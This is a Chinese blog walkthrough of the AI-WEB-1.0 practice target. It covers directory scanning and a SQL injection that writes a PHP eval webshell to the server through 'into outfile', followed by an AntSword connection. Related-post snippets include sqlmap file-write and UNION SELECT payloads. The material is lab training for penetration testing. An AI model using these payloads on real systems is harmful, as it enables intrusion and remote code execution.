AI WEB1.0通关攻略

最新推荐文章于 2024-08-19 21:14:49 发布
最新推荐文章于 2024-08-19 21:14:49 发布
阅读量79 收藏
点赞数 1
分类专栏: AI WEB 通关攻略 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/141332656
版权

1.访问靶机的IP地址

2.通过kali中的dirsearch工具进行目录查找

得到robots.txt,通常情况下,robots.txt文件下有该网站的目录列表

3.访问robots.txt文件,得到如下:

4.通过dirsearch工具再次扫描/m3diNf0目录得到如下:

得到该目录下有一个info.php文件

5.访问/m3diNf0/info.php,得到该网站的根目录

6.访问另一个目录得到一个搜索界面

此界面经测试发现可以进行SQL注入,所以使用该漏洞上传一句话木马

注入语句:

1' union select 1,2,'<?php @eval(\$_POST[cmd];?)>' into outfile '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/sis.php' #

测试是否上传成功,发我该木马文件

上传成功

7.利用蚁剑进行连接

进入靶机目录

Zhong-Xin
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
佳蓝人工智能开源框架 v1.0
12-04
佳蓝人工智能开源框架是以php+mysql进行开发的php开源人工智能框架系统,软件实现了智能应答机器人功能,可以对访客的提问进行相应的自动回复。 佳蓝科技诚邀您共同打造一款能够完美连结服务端云平台、移动客户端、...
web1.0web2.0和web3.0
10-19
- **人工智能**:AI技术将在内容生成、个性化推荐等方面发挥更大的作用。 - **物联网**:物理世界与数字世界的融合将使得日常物品能够通过互联网连接并交换数据。 - **虚拟现实与增强现实**:VR和AR技术将为用户提供...
ai web1.0通关攻略
2301_78031880的博客
08-19 107
扫描目录找到robot.txt目录。
AI Web 1.0通关攻略
2301_80402555的博客
08-19 325
访问http://172.16.1.88/robots.txt,发现/madiNf0/和/se3reTdir777/uploads/两个路径。使用dirb "http://172.16.1.88"进一步扫描,发现有一个robots.txt。访问http://172.16.1.88/se3reTdir777/index.php。使用dirb对/m3diNf0/扫描,发现info.php页面。访问/se3reTdir777/upload/发现也不能。使用dirb对//扫描,发现一个index.php的页面。
AI-Web-1.0通关攻略
最新发布
han14735828432的博客
08-19 88
用dirb扫描发现有robots.txt文件,我们发现robots.txt中有标明目录,我们再去尝试一一访问。输入1' or1=1 #,显示正常,存在注入。采取手工注入方式获得用户名和密码。尝试访问/se3reTdir777/目录,出现一个提交框。用dirsearch发现有php探针文件,我们访问它。用nmap扫ip的端口,发现只有80端口。找到绝对路径并写入一句话木马文件。写入成功后打开蚁剑。
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2549
AI-WEB-1.0靶机的简单攻略
靶机通关|AI-WEB-1.0 靶机通关攻略
a96482的博客
07-30 690
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php。python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump。中发现提交框,开始尝试注入。写入成功,使用蚁剑连接。连接成功,通关完成。
AI-WEB-1.0通关攻略
A2893992091的博客
08-19 278
找到下级目录se3reTdir777/uploads/其中有两条提示的路径,分别访问,寻找注入点。访问该文件,验证是否上传成功。判断出闭合方式为:1'#找到info.php文件。
AI-Web1.0靶场通关攻略
2301_81525518的博客
08-19 47
然后再根据数据库查看表名 -1' union select 1,table_name,3 from information_schema.columns where table_schema='aiweb1' #再根据表名查看列 -1' union select 1,column_name,3 from information_schema.columns where table_name='user' #然后进入kali虚拟机扫描目录文件。扫描到它底下的目录进入浏览器访问。查看php文件发现绝对路径。
Vulnhub靶机:AI-WEB-1.0
weixin_68416970的博客
05-22 1026
Vulnhub靶机:AI-WEB-1.0AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2895
AI-WEB-1.0 多方法渗透
HCIA-AI Solution V1.0 培训手册和实验手册.zip
05-13
《HCIA-AI Solution V1.0 培训手册和实验手册》是华为认证体系中针对人工智能领域的一份重要学习资源,旨在帮助学员掌握基础的人工智能理论知识与实践技能。这份压缩包包含了培训手册和实验手册两部分,旨在通过理论...
key different between Web 1.0 and Web 2.0.pdf
09-04
- **技术发展**:随着云计算、大数据、人工智能等技术的发展,如何将其应用于Web 2.0环境成为研究的重点。 #### 结论 Web 1.0Web 2.0之间的差异不仅体现在技术和架构层面,更重要的是改变了人们使用互联网的方式...
井字棋(人工智能)1.0
02-01
井字棋(人工智能)1.0
人工智能在Web安全领域的应用.pdf
08-08
演讲将从百度在安全领域的实践出发,与大家一起探讨通过人工智能、机器学习领域的经典方法形成的分析系统效果,和他们如何与传统防护系统相互补充的经验。 从ModSecurity开始说起 SQL Tokenizer Parser Analyzer ...
web1.0-2.0-3.0的区别以及设想web4.0.docx
10-21
它不仅提供了更丰富的交互体验,还通过语义理解和人工智能技术,实现了跨网站的数据交互和整合。Web3.0让用户能够在不同的平台上无缝使用自己的数据,无需下载额外的软件就能享受复杂的功能,如即时通讯。此外,Web...
HCIA-AI V1.0 讲师材料.rar
04-01
HCIA-AI V1.0 讲师材料
得推会玩AI系统 v1.0
04-21
得推会玩AI系统 v1.0 是一款基于deituiCMS构建的智能应用程序,它集成了人工智能技术,尤其在图像处理和文本生成方面展现了强大的功能。deituiCMS作为一个内容管理系统,通常提供了灵活的框架和接口,使得开发人员...
语义网与数据理解:从Web1.0Web3.0
"该资源是一份关于语义网的课件,主要涵盖了语义网的基础概念、语义建模,以及自然语言处理和文本分析的相关内容。...随着Web3.0的推进,语义网将对信息处理、人工智能、大数据等领域产生深远影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值